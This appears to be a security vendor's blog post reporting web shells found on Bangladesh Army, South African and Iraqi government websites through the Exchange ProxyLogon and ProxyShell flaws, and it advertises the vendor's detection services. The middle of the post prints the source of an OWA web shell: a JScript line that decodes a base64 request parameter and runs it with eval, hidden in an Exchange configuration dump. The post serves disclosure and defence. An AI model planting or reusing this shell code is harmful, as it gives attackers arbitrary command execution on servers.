Bangladesh, South African and Iraqi Government sites have been found to be hosting web shells

Netcraft recently confirmed that a Bangladesh Army site was hosting an Outlook Web Access (OWA) web shell. Additionally, an OWA web shell was found on the Department of Arts and Culture site for the South-African Kwazulu-Natal province and an Iraqi government site was found to be hosting a PHP shell. Web shells are a common tool used by attackers to maintain control of a compromised web server, providing a web interface from which arbitrary commands can be executed on the server hosting the shell. OWA provides remote access to Microsoft Exchange mailboxes; since the disclosure of the ProxyLogon vulnerabilities in March, Microsoft Exchange has become a popular target for cyberattacks.

When using a browser to visit the web shell installed on the Department of Arts and Culture’s site, the malicious activity was not immediately obvious, with the shell masquerading as a variable dump. Web shells are often buried in the filesystem alongside benign files, making it difficult for webmasters to detect and take them down. Even after patching the vulnerabilities used to install a shell, the shell itself also needs to be removed to stop further malicious activity. Sites containing web shells can often remain compromised for long periods of time.

Screenshot of the OWA web shell on the autodiscover.kzndac.gov.za hostname, which disguises itself as a variable dump

The shell on autodiscover.kzndac.gov.za when visited in the browser.

AdminDisplayVersion             : Version 15.1 (Build 2106.2)
Server                          : REDACTED
InternalUrl                     : https://REDACTED.local/OAB
InternalAuthenticationMethods   : WindowsIntegrated
ExternalUrl                     : http://f/<script language="JScript" runat="server">
function  Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(
Request.Item["REDACTED"])),"unsafe");}</script>
ExternalAuthenticationMethods   : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName               : REDACTED
Identity                        : REDACTEDOAB (Default Web Site)
Guid                            : REDACTED
ObjectCategory                  : REDACTED/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top

Shown above is the source code for a similar OWA web shell. Near the middle of the file is a line of code which allows an attacker to execute an arbitrary command passed in as a request parameter. To find out more about OWA web shells and how they can be obscured, see our blog post on ProxyLogon shells.

Web shells on South African government websites is not a new phenomenon. Netcraft has previously identified 7 OWA web shells on hostnames under gov.za, as well as a PHP web shell. Alongside the PHP web shell on the South African government site was a defacement notice. This defacement notice was identical to one found on a compromised site associated with the Iraqi government, baghdadairport.gov.iq. This notice advertises the criminals involved in both compromises, and an ICQ account offering sale of web shells. The PHP web shell has now been removed, but the defacement remains. When the web shell was present, visiting baghdadairport.gov.iq in a browser revealed a login page characteristic of the WSO (“web shell by oRb”) family.

Screenshot of the web shell at the root of baghdadairport.gov.iq

The web shell on baghdadairport.gov.iq when viewed in a browser, showing a login form protecting the attacker’s control panel.

Screenshot of a defaced site, displaying a notice the site has been hacked

A screenshot of a certain url on baghdadairport.gov.iq when viewed in a browser, displaying a large notice the site has been hacked.

A site belonging to the Bangladesh Army (newmail.army.mil.bd) has also been found to be hosting an OWA web shell installed using the ProxyShell vulnerabilities. This shell takes the form of an ASPX file starting with !BDN, the file signature for a Microsoft Outlook Personal Storage Table (PST) file, indicating that the shell was installed using the ProxyShell vulnerabilities disclosed earlier this year.

Screenshot of a defaced site, displaying a notice the site has been hacked

A screenshot of the shell on https://newmail.army.mil.bd.png.

The nature of web shells makes their detection a difficult task, being installed on obscure paths and giving outputs that appear benign. Fortunately, Netcraft is well equipped to tackle this problem. We provide cybercrime disruption services to 7 governments, and regularly scour the internet to detect malicious content including web shells and malware. Hosting providers can receive an alerting service from Netcraft which will notify them whenever phishing, malware, or web shells are detected on their infrastructure. Organisations targeted by high volume phishing administered via web shells can use Netcraft’s Countermeasures service to disrupt the attacks.